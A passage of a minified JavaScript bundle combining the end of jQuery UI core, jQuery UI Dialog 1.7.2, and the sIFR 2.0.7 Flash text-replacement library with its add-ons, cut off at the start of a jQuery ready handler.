j;if((c.browser.msie&&(/(static|relative)/).test(this.css("position")))||(/absolute/).test(this.css("position"))){j=this.parents().filter(function(){return(/(relative|absolute|fixed)/).test(c.curCSS(this,"position",1))&&(/(auto|scroll)/).test(c.curCSS(this,"overflow",1)+c.curCSS(this,"overflow-y",1)+c.curCSS(this,"overflow-x",1))}).eq(0)}else{j=this.parents().filter(function(){return(/(auto|scroll)/).test(c.curCSS(this,"overflow",1)+c.curCSS(this,"overflow-y",1)+c.curCSS(this,"overflow-x",1))}).eq(0)}return(/fixed/).test(this.css("position"))||!j.length?c(document):j}});c.extend(c.expr[":"],{data:function(l,k,j){return !!c.data(l,j[3])},focusable:function(k){var l=k.nodeName.toLowerCase(),j=c.attr(k,"tabindex");return(/input|select|textarea|button|object/.test(l)?!k.disabled:"a"==l||"area"==l?k.href||!isNaN(j):!isNaN(j))&&!c(k)["area"==l?"parents":"closest"](":hidden").length},tabbable:function(k){var j=c.attr(k,"tabindex");return(isNaN(j)||j>=0)&&c(k).is(":focusable")}});function g(m,n,o,l){function k(q){var p=c[m][n][q]||[];return(typeof p=="string"?p.split(/,?\s+/):p)}var j=k("getter");if(l.length==1&&typeof l[0]=="string"){j=j.concat(k("getterSetter"))}return(c.inArray(o,j)!=-1)}c.widget=function(k,j){var l=k.split(".")[0];k=k.split(".")[1];c.fn[k]=function(p){var n=(typeof p=="string"),o=Array.prototype.slice.call(arguments,1);if(n&&p.substring(0,1)=="_"){return this}if(n&&g(l,k,p,o)){var m=c.data(this[0],k);return(m?m[p].apply(m,o):undefined)}return this.each(function(){var q=c.data(this,k);(!q&&!n&&c.data(this,k,new c[l][k](this,p))._init());(q&&n&&c.isFunction(q[p])&&q[p].apply(q,o))})};c[l]=c[l]||{};c[l][k]=function(o,n){var m=this;this.namespace=l;this.widgetName=k;this.widgetEventPrefix=c[l][k].eventPrefix||k;this.widgetBaseClass=l+"-"+k;this.options=c.extend({},c.widget.defaults,c[l][k].defaults,c.metadata&&c.metadata.get(o)[k],n);this.element=c(o).bind("setData."+k,function(q,p,r){if(q.target==o){return m._setData(p,r)}}).bind("getData."+k,function(q,p){if(q.target==o){return m._getData(p)}}).bind("remove",function(){return m.destroy()})};c[l][k].prototype=c.extend({},c.widget.prototype,j);c[l][k].getterSetter="option"};c.widget.prototype={_init:function(){},destroy:function(){this.element.removeData(this.widgetName).removeClass(this.widgetBaseClass+"-disabled "+this.namespace+"-state-disabled").removeAttr("aria-disabled")},option:function(l,m){var k=l,j=this;if(typeof l=="string"){if(m===undefined){return this._getData(l)}k={};k[l]=m}c.each(k,function(n,o){j._setData(n,o)})},_getData:function(j){return this.options[j]},_setData:function(j,k){this.options[j]=k;if(j=="disabled"){this.element[k?"addClass":"removeClass"](this.widgetBaseClass+"-disabled "+this.namespace+"-state-disabled").attr("aria-disabled",k)}},enable:function(){this._setData("disabled",false)},disable:function(){this._setData("disabled",true)},_trigger:function(l,m,n){var p=this.options[l],j=(l==this.widgetEventPrefix?l:this.widgetEventPrefix+l);m=c.Event(m);m.type=j;if(m.originalEvent){for(var k=c.event.props.length,o;k;){o=c.event.props[--k];m[o]=m.originalEvent[o]}}this.element.trigger(m,n);return !(c.isFunction(p)&&p.call(this.element[0],m,n)===false||m.isDefaultPrevented())}};c.widget.defaults={disabled:false};c.ui.mouse={_mouseInit:function(){var j=this;this.element.bind("mousedown."+this.widgetName,function(k){return j._mouseDown(k)}).bind("click."+this.widgetName,function(k){if(j._preventClickEvent){j._preventClickEvent=false;k.stopImmediatePropagation();return false}});if(c.browser.msie){this._mouseUnselectable=this.element.attr("unselectable");this.element.attr("unselectable","on")}this.started=false},_mouseDestroy:function(){this.element.unbind("."+this.widgetName);(c.browser.msie&&this.element.attr("unselectable",this._mouseUnselectable))},_mouseDown:function(l){l.originalEvent=l.originalEvent||{};if(l.originalEvent.mouseHandled){return}(this._mouseStarted&&this._mouseUp(l));this._mouseDownEvent=l;var k=this,m=(l.which==1),j=(typeof this.options.cancel=="string"?c(l.target).parents().add(l.target).filter(this.options.cancel).length:false);if(!m||j||!this._mouseCapture(l)){return true}this.mouseDelayMet=!this.options.delay;if(!this.mouseDelayMet){this._mouseDelayTimer=setTimeout(function(){k.mouseDelayMet=true},this.options.delay)}if(this._mouseDistanceMet(l)&&this._mouseDelayMet(l)){this._mouseStarted=(this._mouseStart(l)!==false);if(!this._mouseStarted){l.preventDefault();return true}}this._mouseMoveDelegate=function(n){return k._mouseMove(n)};this._mouseUpDelegate=function(n){return k._mouseUp(n)};c(document).bind("mousemove."+this.widgetName,this._mouseMoveDelegate).bind("mouseup."+this.widgetName,this._mouseUpDelegate);(c.browser.safari||l.preventDefault());l.originalEvent.mouseHandled=true;return true},_mouseMove:function(j){if(c.browser.msie&&!j.button){return this._mouseUp(j)}if(this._mouseStarted){this._mouseDrag(j);return j.preventDefault()}if(this._mouseDistanceMet(j)&&this._mouseDelayMet(j)){this._mouseStarted=(this._mouseStart(this._mouseDownEvent,j)!==false);(this._mouseStarted?this._mouseDrag(j):this._mouseUp(j))}return !this._mouseStarted},_mouseUp:function(j){c(document).unbind("mousemove."+this.widgetName,this._mouseMoveDelegate).unbind("mouseup."+this.widgetName,this._mouseUpDelegate);if(this._mouseStarted){this._mouseStarted=false;this._preventClickEvent=(j.target==this._mouseDownEvent.target);this._mouseStop(j)}return false},_mouseDistanceMet:function(j){return(Math.max(Math.abs(this._mouseDownEvent.pageX-j.pageX),Math.abs(this._mouseDownEvent.pageY-j.pageY))>=this.options.distance)},_mouseDelayMet:function(j){return this.mouseDelayMet},_mouseStart:function(j){},_mouseDrag:function(j){},_mouseStop:function(j){},_mouseCapture:function(j){return true}};c.ui.mouse.defaults={cancel:null,distance:1,delay:0}})(jQuery);;/*
 * jQuery UI Dialog 1.7.2
 *
 * Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
 * Dual licensed under the MIT (MIT-LICENSE.txt)
 * and GPL (GPL-LICENSE.txt) licenses.
 *
 * http://docs.jquery.com/UI/Dialog
 *
 * Depends:
 *	ui.core.js
 *	ui.draggable.js
 *	ui.resizable.js
 */
(function(c){var b={dragStart:"start.draggable",drag:"drag.draggable",dragStop:"stop.draggable",maxHeight:"maxHeight.resizable",minHeight:"minHeight.resizable",maxWidth:"maxWidth.resizable",minWidth:"minWidth.resizable",resizeStart:"start.resizable",resize:"drag.resizable",resizeStop:"stop.resizable"},a="ui-dialog ui-widget ui-widget-content ui-corner-all ";c.widget("ui.dialog",{_init:function(){this.originalTitle=this.element.attr("title");var l=this,m=this.options,j=m.title||this.originalTitle||"&nbsp;",e=c.ui.dialog.getTitleId(this.element),k=(this.uiDialog=c("<div/>")).appendTo(document.body).hide().addClass(a+m.dialogClass).css({position:"absolute",overflow:"hidden",zIndex:m.zIndex}).attr("tabIndex",-1).css("outline",0).keydown(function(n){(m.closeOnEscape&&n.keyCode&&n.keyCode==c.ui.keyCode.ESCAPE&&l.close(n))}).attr({role:"dialog","aria-labelledby":e}).mousedown(function(n){l.moveToTop(false,n)}),g=this.element.show().removeAttr("title").addClass("ui-dialog-content ui-widget-content").appendTo(k),f=(this.uiDialogTitlebar=c("<div></div>")).addClass("ui-dialog-titlebar ui-widget-header ui-corner-all ui-helper-clearfix").prependTo(k),i=c('<a href="#"/>').addClass("ui-dialog-titlebar-close ui-corner-all").attr("role","button").hover(function(){i.addClass("ui-state-hover")},function(){i.removeClass("ui-state-hover")}).focus(function(){i.addClass("ui-state-focus")}).blur(function(){i.removeClass("ui-state-focus")}).mousedown(function(n){n.stopPropagation()}).click(function(n){l.close(n);return false}).appendTo(f),h=(this.uiDialogTitlebarCloseText=c("<span/>")).addClass("ui-icon ui-icon-closethick").text(m.closeText).appendTo(i),d=c("<span/>").addClass("ui-dialog-title").attr("id",e).html(j).prependTo(f);f.find("*").add(f).disableSelection();(m.draggable&&c.fn.draggable&&this._makeDraggable());(m.resizable&&c.fn.resizable&&this._makeResizable());this._createButtons(m.buttons);this._isOpen=false;(m.bgiframe&&c.fn.bgiframe&&k.bgiframe());(m.autoOpen&&this.open())},destroy:function(){(this.overlay&&this.overlay.destroy());this.uiDialog.hide();this.element.unbind(".dialog").removeData("dialog").removeClass("ui-dialog-content ui-widget-content").hide().appendTo("body");this.uiDialog.remove();(this.originalTitle&&this.element.attr("title",this.originalTitle))},close:function(f){var d=this;if(false===d._trigger("beforeclose",f)){return}(d.overlay&&d.overlay.destroy());d.uiDialog.unbind("keypress.ui-dialog");(d.options.hide?d.uiDialog.hide(d.options.hide,function(){d._trigger("close",f)}):d.uiDialog.hide()&&d._trigger("close",f));c.ui.dialog.overlay.resize();d._isOpen=false;if(d.options.modal){var e=0;c(".ui-dialog").each(function(){if(this!=d.uiDialog[0]){e=Math.max(e,c(this).css("z-index"))}});c.ui.dialog.maxZ=e}},isOpen:function(){return this._isOpen},moveToTop:function(f,e){if((this.options.modal&&!f)||(!this.options.stack&&!this.options.modal)){return this._trigger("focus",e)}if(this.options.zIndex>c.ui.dialog.maxZ){c.ui.dialog.maxZ=this.options.zIndex}(this.overlay&&this.overlay.$el.css("z-index",c.ui.dialog.overlay.maxZ=++c.ui.dialog.maxZ));var d={scrollTop:this.element.attr("scrollTop"),scrollLeft:this.element.attr("scrollLeft")};this.uiDialog.css("z-index",++c.ui.dialog.maxZ);this.element.attr(d);this._trigger("focus",e)},open:function(){if(this._isOpen){return}var e=this.options,d=this.uiDialog;this.overlay=e.modal?new c.ui.dialog.overlay(this):null;(d.next().length&&d.appendTo("body"));this._size();this._position(e.position);d.show(e.show);this.moveToTop(true);(e.modal&&d.bind("keypress.ui-dialog",function(h){if(h.keyCode!=c.ui.keyCode.TAB){return}var g=c(":tabbable",this),i=g.filter(":first")[0],f=g.filter(":last")[0];if(h.target==f&&!h.shiftKey){setTimeout(function(){i.focus()},1)}else{if(h.target==i&&h.shiftKey){setTimeout(function(){f.focus()},1)}}}));c([]).add(d.find(".ui-dialog-content :tabbable:first")).add(d.find(".ui-dialog-buttonpane :tabbable:first")).add(d).filter(":first").focus();this._trigger("open");this._isOpen=true},_createButtons:function(g){var f=this,d=false,e=c("<div></div>").addClass("ui-dialog-buttonpane ui-widget-content ui-helper-clearfix");this.uiDialog.find(".ui-dialog-buttonpane").remove();(typeof g=="object"&&g!==null&&c.each(g,function(){return !(d=true)}));if(d){c.each(g,function(h,i){c('<button type="button"></button>').addClass("ui-state-default ui-corner-all").text(h).click(function(){i.apply(f.element[0],arguments)}).hover(function(){c(this).addClass("ui-state-hover")},function(){c(this).removeClass("ui-state-hover")}).focus(function(){c(this).addClass("ui-state-focus")}).blur(function(){c(this).removeClass("ui-state-focus")}).appendTo(e)});e.appendTo(this.uiDialog)}},_makeDraggable:function(){var d=this,f=this.options,e;this.uiDialog.draggable({cancel:".ui-dialog-content",handle:".ui-dialog-titlebar",containment:"document",start:function(){e=f.height;c(this).height(c(this).height()).addClass("ui-dialog-dragging");(f.dragStart&&f.dragStart.apply(d.element[0],arguments))},drag:function(){(f.drag&&f.drag.apply(d.element[0],arguments))},stop:function(){c(this).removeClass("ui-dialog-dragging").height(e);(f.dragStop&&f.dragStop.apply(d.element[0],arguments));c.ui.dialog.overlay.resize()}})},_makeResizable:function(g){g=(g===undefined?this.options.resizable:g);var d=this,f=this.options,e=typeof g=="string"?g:"n,e,s,w,se,sw,ne,nw";this.uiDialog.resizable({cancel:".ui-dialog-content",alsoResize:this.element,maxWidth:f.maxWidth,maxHeight:f.maxHeight,minWidth:f.minWidth,minHeight:f.minHeight,start:function(){c(this).addClass("ui-dialog-resizing");(f.resizeStart&&f.resizeStart.apply(d.element[0],arguments))},resize:function(){(f.resize&&f.resize.apply(d.element[0],arguments))},handles:e,stop:function(){c(this).removeClass("ui-dialog-resizing");f.height=c(this).height();f.width=c(this).width();(f.resizeStop&&f.resizeStop.apply(d.element[0],arguments));c.ui.dialog.overlay.resize()}}).find(".ui-resizable-se").addClass("ui-icon ui-icon-grip-diagonal-se")},_position:function(i){var e=c(window),f=c(document),g=f.scrollTop(),d=f.scrollLeft(),h=g;if(c.inArray(i,["center","top","right","bottom","left"])>=0){i=[i=="right"||i=="left"?i:"center",i=="top"||i=="bottom"?i:"middle"]}if(i.constructor!=Array){i=["center","middle"]}if(i[0].constructor==Number){d+=i[0]}else{switch(i[0]){case"left":d+=0;break;case"right":d+=e.width()-this.uiDialog.outerWidth();break;default:case"center":d+=(e.width()-this.uiDialog.outerWidth())/2}}if(i[1].constructor==Number){g+=i[1]}else{switch(i[1]){case"top":g+=0;break;case"bottom":g+=e.height()-this.uiDialog.outerHeight();break;default:case"middle":g+=(e.height()-this.uiDialog.outerHeight())/2}}g=Math.max(g,h);this.uiDialog.css({top:g,left:d})},_setData:function(e,f){(b[e]&&this.uiDialog.data(b[e],f));switch(e){case"buttons":this._createButtons(f);break;case"closeText":this.uiDialogTitlebarCloseText.text(f);break;case"dialogClass":this.uiDialog.removeClass(this.options.dialogClass).addClass(a+f);break;case"draggable":(f?this._makeDraggable():this.uiDialog.draggable("destroy"));break;case"height":this.uiDialog.height(f);break;case"position":this._position(f);break;case"resizable":var d=this.uiDialog,g=this.uiDialog.is(":data(resizable)");(g&&!f&&d.resizable("destroy"));(g&&typeof f=="string"&&d.resizable("option","handles",f));(g||this._makeResizable(f));break;case"title":c(".ui-dialog-title",this.uiDialogTitlebar).html(f||"&nbsp;");break;case"width":this.uiDialog.width(f);break}c.widget.prototype._setData.apply(this,arguments)},_size:function(){var e=this.options;this.element.css({height:0,minHeight:0,width:"auto"});var d=this.uiDialog.css({height:"auto",width:e.width}).height();this.element.css({minHeight:Math.max(e.minHeight-d,0),height:e.height=="auto"?"auto":Math.max(e.height-d,0)})}});c.extend(c.ui.dialog,{version:"1.7.2",defaults:{autoOpen:true,bgiframe:false,buttons:{},closeOnEscape:true,closeText:"close",dialogClass:"",draggable:true,hide:null,height:"auto",maxHeight:false,maxWidth:false,minHeight:150,minWidth:150,modal:false,position:"center",resizable:true,show:null,stack:true,title:"",width:300,zIndex:1000},getter:"isOpen",uuid:0,maxZ:0,getTitleId:function(d){return"ui-dialog-title-"+(d.attr("id")||++this.uuid)},overlay:function(d){this.$el=c.ui.dialog.overlay.create(d)}});c.extend(c.ui.dialog.overlay,{instances:[],maxZ:0,events:c.map("focus,mousedown,mouseup,keydown,keypress,click".split(","),function(d){return d+".dialog-overlay"}).join(" "),create:function(e){if(this.instances.length===0){setTimeout(function(){if(c.ui.dialog.overlay.instances.length){c(document).bind(c.ui.dialog.overlay.events,function(f){var g=c(f.target).parents(".ui-dialog").css("zIndex")||0;return(g>c.ui.dialog.overlay.maxZ)})}},1);c(document).bind("keydown.dialog-overlay",function(f){(e.options.closeOnEscape&&f.keyCode&&f.keyCode==c.ui.keyCode.ESCAPE&&e.close(f))});c(window).bind("resize.dialog-overlay",c.ui.dialog.overlay.resize)}var d=c("<div></div>").appendTo(document.body).addClass("ui-widget-overlay").css({width:this.width(),height:this.height()});(e.options.bgiframe&&c.fn.bgiframe&&d.bgiframe());this.instances.push(d);return d},destroy:function(d){this.instances.splice(c.inArray(this.instances,d),1);if(this.instances.length===0){c([document,window]).unbind(".dialog-overlay")}d.remove();var e=0;c.each(this.instances,function(){e=Math.max(e,this.css("z-index"))});this.maxZ=e},height:function(){if(c.browser.msie&&c.browser.version<7){var e=Math.max(document.documentElement.scrollHeight,document.body.scrollHeight);var d=Math.max(document.documentElement.offsetHeight,document.body.offsetHeight);if(e<d){return c(window).height()+"px"}else{return e+"px"}}else{return c(document).height()+"px"}},width:function(){if(c.browser.msie&&c.browser.version<7){var d=Math.max(document.documentElement.scrollWidth,document.body.scrollWidth);var e=Math.max(document.documentElement.offsetWidth,document.body.offsetWidth);if(d<e){return c(window).width()+"px"}else{return d+"px"}}else{return c(document).width()+"px"}},resize:function(){var d=c([]);c.each(c.ui.dialog.overlay.instances,function(){d=d.add(this)});d.css({width:0,height:0}).css({width:c.ui.dialog.overlay.width(),height:c.ui.dialog.overlay.height()})}});c.extend(c.ui.dialog.overlay.prototype,{destroy:function(){c.ui.dialog.overlay.destroy(this.$el)}})})(jQuery);;;
/*	sIFR v2.0.7
	Copyright 2004 - 2008 Mark Wubben and Mike Davidson. Prior contributions by Shaun Inman and Tomas Jogin.
	
	This software is licensed under the CC-GNU LGPL <http://creativecommons.org/licenses/LGPL/2.1/>
*/

var hasFlash=function(){var a=6;if(navigator.appVersion.indexOf("MSIE")!=-1&&navigator.appVersion.indexOf("Windows")>-1){document.write('<script language="VBScript"\> \non error resume next \nhasFlash = (IsObject(CreateObject("ShockwaveFlash.ShockwaveFlash." & '+a+'))) \n</script\> \n');if(window.hasFlash!=null)return window.hasFlash}if(navigator.mimeTypes&&navigator.mimeTypes["application/x-shockwave-flash"]&&navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){var b=(navigator.plugins["Shockwave Flash 2.0"]||navigator.plugins["Shockwave Flash"]).description;return parseInt(b.substr(b.indexOf(".")-2,2),10)>=a}return false}();String.prototype.normalize=function(){return this.replace(/\s+/g," ")};if(Array.prototype.push==null){Array.prototype.push=function(){var i=0,a=this.length,b=arguments.length;while(i<b){this[a++]=arguments[i++]}return this.length}}if(!Function.prototype.apply){Function.prototype.apply=function(a,b){var c=[];var d,e;if(!a)a=window;if(!b)b=[];for(var i=0;i<b.length;i++){c[i]="b["+i+"]"}e="a.__applyTemp__("+c.join(",")+");";a.__applyTemp__=this;d=eval(e);a.__applyTemp__=null;return d}}function named(a){return new named.Arguments(a)}named.Arguments=function(a){this.oArgs=a};named.Arguments.prototype.constructor=named.Arguments;named.extract=function(a,b){var c,d;var i=a.length;while(i--){d=a[i];if(d!=null&&d.constructor!=null&&d.constructor==named.Arguments){c=a[i].oArgs;break}}if(c==null)return;for(e in c)if(b[e]!=null)b[e](c[e]);return};var parseSelector=function(){var a=/^([^#.>`]*)(#|\.|\>|\`)(.+)$/;function r(s,t){var u=s.split(/\s*\,\s*/);var v=[];for(var i=0;i<u.length;i++)v=v.concat(b(u[i],t));return v}function b(c,d,e){c=c.normalize().replace(" ","`");var f=c.match(a);var g,h,i,j,k,n;var l=[];if(f==null)f=[c,c];if(f[1]=="")f[1]="*";if(e==null)e="`";if(d==null)d=document;switch(f[2]){case "#":k=f[3].match(a);if(k==null)k=[null,f[3]];g=document.getElementById(k[1]);if(g==null||(f[1]!="*"&&!o(g,f[1])))return l;if(k.length==2){l.push(g);return l}return b(k[3],g,k[2]);case ".":if(e!=">")h=m(d,f[1]);else h=d.childNodes;for(i=0,n=h.length;i<n;i++){g=h[i];if(g.nodeType!=1)continue;k=f[3].match(a);if(k!=null){if(g.className==null||g.className.match("(\\s|^)"+k[1]+"(\\s|$)")==null)continue;j=b(k[3],g,k[2]);l=l.concat(j)}else if(g.className!=null&&g.className.match("(\\s|^)"+f[3]+"(\\s|$)")!=null)l.push(g)}return l;case ">":if(e!=">")h=m(d,f[1]);else h=d.childNodes;for(i=0,n=h.length;i<n;i++){g=h[i];if(g.nodeType!=1)continue;if(!o(g,f[1]))continue;j=b(f[3],g,">");l=l.concat(j)}return l;case "`":h=m(d,f[1]);for(i=0,n=h.length;i<n;i++){g=h[i];j=b(f[3],g,"`");l=l.concat(j)}return l;default:if(e!=">")h=m(d,f[1]);else h=d.childNodes;for(i=0,n=h.length;i<n;i++){g=h[i];if(g.nodeType!=1)continue;if(!o(g,f[1]))continue;l.push(g)}return l}}function m(d,o){if(o=="*"&&d.all!=null)return d.all;return d.getElementsByTagName(o)}function o(p,q){return q=="*"?true:p.nodeName.toLowerCase().replace("html:", "")==q.toLowerCase()}return r}();var sIFR=function(){var a="http://www.w3.org/1999/xhtml";var b=false;var c=false;var d;var ah=[];var al=document;var ak=al.documentElement;var am=window;var au=al.addEventListener;var av=am.addEventListener;var f=function(){var g=navigator.userAgent.toLowerCase();var f={a:g.indexOf("applewebkit")>-1,b:g.indexOf("safari")>-1,c:navigator.product!=null&&navigator.product.toLowerCase().indexOf("konqueror")>-1,d:g.indexOf("opera")>-1,e:al.contentType!=null&&al.contentType.indexOf("xml")>-1,f:true,g:true,h:null,i:null,j:null,k:null};f.l=f.a||f.c;f.m=!f.a&&navigator.product!=null&&navigator.product.toLowerCase()=="gecko";if(f.m&&g.match(/.*gecko\/(\d{8}).*/))f.j=new Number(g.match(/.*gecko\/(\d{8}).*/)[1]);f.n=g.indexOf("msie")>-1&&!f.d&&!f.l&&!f.m;f.o=f.n&&g.match(/.*mac.*/)!=null;if(f.d&&g.match(/.*opera(\s|\/)(\d+\.\d+)/))f.i=new Number(g.match(/.*opera(\s|\/)(\d+\.\d+)/)[2]);if(f.n||(f.d&&f.i<7.6))f.g=false;if(f.a&&g.match(/.*applewebkit\/(\d+).*/))f.k=new Number(g.match(/.*applewebkit\/(\d+).*/)[1]);if(am.hasFlash&&(!f.n||f.o)){var aj=(navigator.plugins["Shockwave Flash 2.0"]||navigator.plugins["Shockwave Flash"]).description;f.h=parseInt(aj.substr(aj.indexOf(".")-2,2),10)}if(g.match(/.*(windows|mac).*/)==null||f.o||f.c||(f.d&&(g.match(/.*mac.*/)!=null||f.i<7.6))||(f.b&&f.h<7)||(!f.b&&f.a&&f.k<312)||(f.m&&f.j<20020523))f.f=false;if(!f.o&&!f.m&&al.createElementNS)try{al.createElementNS(a,"i").innerHTML=""}catch(e){f.e=true}f.p=f.c||(f.a&&f.k<312);return f}();function at(){return{bIsWebKit:f.a,bIsSafari:f.b,bIsKonq:f.c,bIsOpera:f.d,bIsXML:f.e,bHasTransparencySupport:f.f,bUseDOM:f.g,nFlashVersion:f.h,nOperaVersion:f.i,nGeckoBuildDate:f.j,nWebKitVersion:f.k,bIsKHTML:f.l,bIsGecko:f.m,bIsIE:f.n,bIsIEMac:f.o,bUseInnerHTMLHack:f.p}}if(am.hasFlash==false||!al.getElementsByTagName||!al.getElementById||(f.e&&(f.p||f.n)))return{UA:at()};function af(e){if((!k.bAutoInit&&(am.event||e)!=null)||!l(e))return;b=true;for(var i=0,h=ah.length;i<h;i++)j.apply(null,ah[i]);ah=[]}var k=af;function l(e){if(c==false||k.bIsDisabled==true||((f.e&&f.m||f.l)&&e==null&&b==false)||al.getElementsByTagName("body").length==0)return false;return true}function m(n){if(f.n)return n.replace(new RegExp("%\d{0}","g"),"%25");return n.replace(new RegExp("%(?!\d)","g"),"%25")}function as(p,q){return q=="*"?true:p.nodeName.toLowerCase().replace("html:", "")==q.toLowerCase()}function o(p,q,r,s,t){var u="";var v=p.firstChild;var w,x,y,z;if(s==null)s=0;if(t==null)t="";while(v){if(v.nodeType==3){z=v.nodeValue.replace("<","&lt;");switch(r){case "lower":u+=z.toLowerCase();break;case "upper":u+=z.toUpperCase();break;default:u+=z}}else if(v.nodeType==1){if(as(v,"a")&&!v.getAttribute("href")==false){if(v.getAttribute("target"))t+="&sifr_url_"+s+"_target="+v.getAttribute("target");t+="&sifr_url_"+s+"="+m(v.getAttribute("href")).replace(/&/g,"%26");u+='<a href="asfunction:_root.launchURL,'+s+'">';s++}else if(as(v,"br"))u+="<br/>";if(v.hasChildNodes()){y=o(v,null,r,s,t);u+=y.u;s=y.s;t=y.t}if(as(v,"a"))u+="</a>"}w=v;v=v.nextSibling;if(q!=null){x=w.parentNode.removeChild(w);q.appendChild(x)}}return{"u":u,"s":s,"t":t}}function A(B){if(al.createElementNS&&f.g)return al.createElementNS(a,B);return al.createElement(B)}function C(D,E,z){var p=A("param");p.setAttribute("name",E);p.setAttribute("value",z);D.appendChild(p)}function F(p,G){var H=p.className;if(H==null)H=G;else H=H.normalize()+(H==""?"":" ")+G;p.className=H}function aq(ar){var a=ak;if(k.bHideBrowserText==false)a=al.getElementsByTagName("body")[0];if((k.bHideBrowserText==false||ar)&&a)if(a.className==null||a.className.match(/\bsIFR\-hasFlash\b/)==null)F(a, "sIFR-hasFlash")}function j(I,J,K,L,M,N,O,P,Q,R,S,r,T){if(!l())return ah.push(arguments);aq();named.extract(arguments,{sSelector:function(ap){I=ap},sFlashSrc:function(ap){J=ap},sColor:function(ap){K=ap},sLinkColor:function(ap){L=ap},sHoverColor:function(ap){M=ap},sBgColor:function(ap){N=ap},nPaddingTop:function(ap){O=ap},nPaddingRight:function(ap){P=ap},nPaddingBottom:function(ap){Q=ap},nPaddingLeft:function(ap){R=ap},sFlashVars:function(ap){S=ap},sCase:function(ap){r=ap},sWmode:function(ap){T=ap}});var U=parseSelector(I);if(U.length==0)return false;if(S!=null)S="&"+S.normalize();else S="";if(K!=null)S+="&textcolor="+K;if(M!=null)S+="&hovercolor="+M;if(M!=null||L!=null)S+="&linkcolor="+(L||K);if(O==null)O=0;if(P==null)P=0;if(Q==null)Q=0;if(R==null)R=0;if(N==null)N="#FFFFFF";if(T=="transparent")if(!f.f)T="opaque";else N="transparent";if(T==null)T="";var p,V,W,X,Y,Z,aa,ab,ac;var ad=null;for(var i=0,h=U.length;i<h;i++){p=U[i];if(p.className!=null&&p.className.match(/\bsIFR\-replaced\b/)!=null)continue;V=p.offsetWidth-R-P;W=p.offsetHeight-O-Q;aa=A("span");aa.className="sIFR-alternate";ac=o(p,aa,r);Z="txt="+m(ac.u).replace(/\+/g,"%2B").replace(/&/g,"%26").replace(/\"/g, "%22").normalize() + S + "&w=" + V + "&h=" + W + ac.t;F(p,"sIFR-replaced");if(ad==null||!f.g){if(!f.g){if(!f.n)p.innerHTML=['<embed class="sIFR-flash" type="application/x-shockwave-flash" src="',J,'" quality="best" wmode="',T,'" bgcolor="',N,'" flashvars="',Z,'" width="',V,'" height="',W,'" sifr="true"></embed>'].join("");else p.innerHTML=['<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" sifr="true" width="',V,'" height="',W,'" class="sIFR-flash"><param name="movie" value="',J,'"></param><param name="flashvars" value="',Z,'"></param><param name="quality" value="best"></param><param name="wmode" value="',T,'"></param><param name="bgcolor" value="',N,'"></param> </object>'].join('')}else{if(f.d){ab=A("object");ab.setAttribute("data",J);C(ab,"quality","best");C(ab,"wmode",T);C(ab,"bgcolor",N)}else{ab=A("embed");ab.setAttribute("src",J);ab.setAttribute("quality","best");ab.setAttribute("flashvars",Z);ab.setAttribute("wmode",T);ab.setAttribute("bgcolor",N)}ab.setAttribute("sifr","true");ab.setAttribute("type","application/x-shockwave-flash");ab.className="sIFR-flash";if(!f.l||!f.e)ad=ab.cloneNode(true)}}else ab=ad.cloneNode(true);if(f.g){if(f.d)C(ab,"flashvars",Z);else ab.setAttribute("flashvars",Z);ab.setAttribute("width",V);ab.setAttribute("height",W);ab.style.width=V+"px";ab.style.height=W+"px";p.appendChild(ab)}p.appendChild(aa);if(f.p)p.innerHTML+=""}if(f.n&&k.bFixFragIdBug)setTimeout(function(){al.title=d},0)}function ai(){d=al.title}function ae(){if(k.bIsDisabled==true)return;c=true;if(k.bHideBrowserText)aq(true);if(am.attachEvent)am.attachEvent("onload",af);else if(!f.c&&(al.addEventListener||am.addEventListener)){if(f.a&&f.k>=132&&am.addEventListener)am.addEventListener("load",function(){setTimeout("sIFR({})",1)},false);else{if(al.addEventListener)al.addEventListener("load",af,false);if(am.addEventListener)am.addEventListener("load",af,false)}}else if(typeof am.onload=="function"){var ag=am.onload;am.onload=function(){ag();af()}}else am.onload=af;if(!f.n||am.location.hash=="")k.bFixFragIdBug=false;else ai()}k.UA=at();k.bAutoInit=true;k.bFixFragIdBug=true;k.replaceElement=j;k.updateDocumentTitle=ai;k.appendToClassName=F;k.setup=ae;k.debug=function(){aq(true)};k.debug.replaceNow=function(){ae();k()};k.bIsDisabled=false;k.bHideBrowserText=true;return k}();

if(typeof sIFR == "function" && !sIFR.UA.bIsIEMac && (!sIFR.UA.bIsWebKit || sIFR.UA.nWebKitVersion >= 100)){
	sIFR.setup();
};;
/*	sIFR 2.0.1 Official Add-ons 1.2
	Copyright 2005 Mark Wubben

	This software is licensed under the CC-GNU LGPL <http://creativecommons.org/licenses/LGPL/2.1/>
*/

if(typeof sIFR=="function")(function(){var j=document;var h=j.documentElement;sIFR.removeDecoyClasses=function(){function a(b){if(b&&b.className!=null)b.className=b.className.replace(/\bsIFR-hasFlash\b/,"")}return function(){a(h);a(j.getElementsByTagName("body")[0])}}();sIFR.preferenceManager={storage:{sCookieId:"sifr",set:function(a){var b=new Date();b.setFullYear(b.getFullYear()+3);j.cookie=[this.sCookieId,"=",a,";expires=",b.toGMTString(),";path=/"].join("")},get:function(){var a=j.cookie.match(new RegExp(";?"+this.sCookieId+"=([^;]+);?"));if(a!=null&&a[1]=="false")return false;else return true},reset:function(){var a=new Date();a.setFullYear(a.getFullYear()-1);j.cookie=[this.sCookieId,"=true;expires=",a.toGMTString(),";path=/"].join("")}},disable:function(){this.storage.set(false)},enable:function(){this.storage.set(true)},test:function(){return this.storage.get()}};if(sIFR.preferenceManager.test()==false){sIFR.bIsDisabled=true;sIFR.removeDecoyClasses()}sIFR.rollback=function(){function a(b){var c,d,e,f,g,h;var l=parseSelector(b);var i=l.length-1;var m=false;while(i>=0){c=l[i];l.length--;d=c.parentNode;if(c.getAttribute("sifr")=="true"){h=0;while(h<d.childNodes.length){c=d.childNodes[h];if(c.className=="sIFR-alternate"){e=c;h++;continue}d.removeChild(c)}if(e!=null){f=e.firstChild;while(f!=null){g=f.nextSibling;d.appendChild(e.removeChild(f));f=g}d.removeChild(e)}if(!sIFR.UA.bIsXML&&sIFR.UA.bUseInnerHTMLHack)d.innerHTML+="";d.className=d.className.replace(/\bsIFR\-replaced\b/,"")};m=true;i--}return m}return function(k){named.extract(arguments,{sSelector:function(a){k=a}});if(k==null)k="";else k+=">";sIFR.removeDecoyClasses();sIFR.bHideBrowserText=false;if(a(k+"embed")==false)a(k+"object")}}()})();
$(function() {
